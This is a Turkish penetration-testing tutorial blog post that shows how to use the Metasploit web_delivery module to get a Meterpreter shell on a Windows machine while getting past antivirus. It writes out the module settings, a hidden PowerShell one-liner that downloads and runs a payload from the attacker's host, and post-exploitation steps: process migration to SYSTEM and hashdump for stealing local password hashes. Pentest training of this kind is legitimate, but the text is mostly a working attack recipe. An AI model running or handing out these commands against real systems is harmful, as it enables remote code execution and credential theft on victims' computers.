MSF web_delivery İstismar Modülü İle Meterpreter Erişimi Elde Edilmesi

Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, MSF web_delivery istismar modülü kullanılarak Powershell tabanlı bir payload hazırlanacak ve hedef bilgisayarda Powershell komutu çalıtırılarak Meterpreter kabuğu elde edilecektir.

MSF web_delivery istismar modülü, web sunucusu (Kali) üzerinden kurban sistemlere payload göndermek için kullanılır. Bu modül, kurban sistemlerde çalıştırılan bir komut ile web suncusunda kayıtlı olan zararlı yazılım çağırılarak çalıştırılması için kullanılır. Kurban işletim sisteminde kurumlarda ve son kullanıcı bilgisayarlarında en çok kullanılan anti-virüslerden biri yüklü olmasına rağmen Meterpreter bağlantısının elde edilebildiği görülecektir.

Modül ile ilgili temel seçenekler aşağıdaki gibidir.

search web_delivery
use exploit/multi/script/web_delivery
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-web-delivery-exploit-module-01

Modülün desteklediği 3 hedef bulunmaktadır: Python (0), PHP (1), PSH (2). Bu yazıda hazırlanacak olan payload, Windows istemcideki Powershell uygulaması için hazırlanacaktır. Modüle ait seçenekler aşağıdaki gibi ayarlanabilir.

set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.100.10
set LPORT 443
set TARGET 2
set SRVPORT 80
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-web-delivery-exploit-module-02

Modül başlatılarak, kurban sistemde çalıştırılacak olan komut elde edilir.

exploit

acquiring-meterpreter-shell-on-windows-by-using-msf-web-delivery-exploit-module-03

Powershell komutu ile windows komut satırı ile çalıştırıldığında, Kali bilgisayarın 80. portunda çalışan web sunucuya talep yapılmakta ve bir katar (string / payload) indirilip çalıştırılmaktadır.

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://192.168.100.10/NJg3wXgOlVkV4g5’))

acquiring-meterpreter-shell-on-windows-by-using-msf-web-delivery-exploit-module-04

Böylece Kali tarafında talep yakalanmaktadır. Powershell komutunu çalıştıran kullanıcı hakları ile 32 bitlik Powershell prosesi üzerinde Meterpreter bağlantısının elde edildiği görülmektedir.

sessions
sessions -i 1
getuid
getpid
ps -U Vedat

acquiring-meterpreter-shell-on-windows-by-using-msf-web-delivery-exploit-module-05

Vedat hesabının yerel yönetici olduğu ve bir sıkılaştırma ayarının olmadığı varsayılırsa, yerel kullanıcıların parolasının elde edilebildiği görülmektedir. Meterpreter “hashdump” komutu yapısı gereği, 64 bitlik bir bilgisayarda 64 bitlik SYSTEM yetkileri ile çalışan bir proses üzerinde iken, etkin olarak çalışmaktadır.

ps -s
migrate 1868
hashdump

acquiring-meterpreter-shell-on-windows-by-using-msf-web-delivery-exploit-module-06

Powershell betiği tarafından indirilen katar içeriği (http://192.168.100.10/NJg3wXgOlVkV4g5) aşağıdaki gibidir.

acquiring-meterpreter-shell-on-windows-by-using-msf-web-delivery-exploit-module-07

 

Kaynak:

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.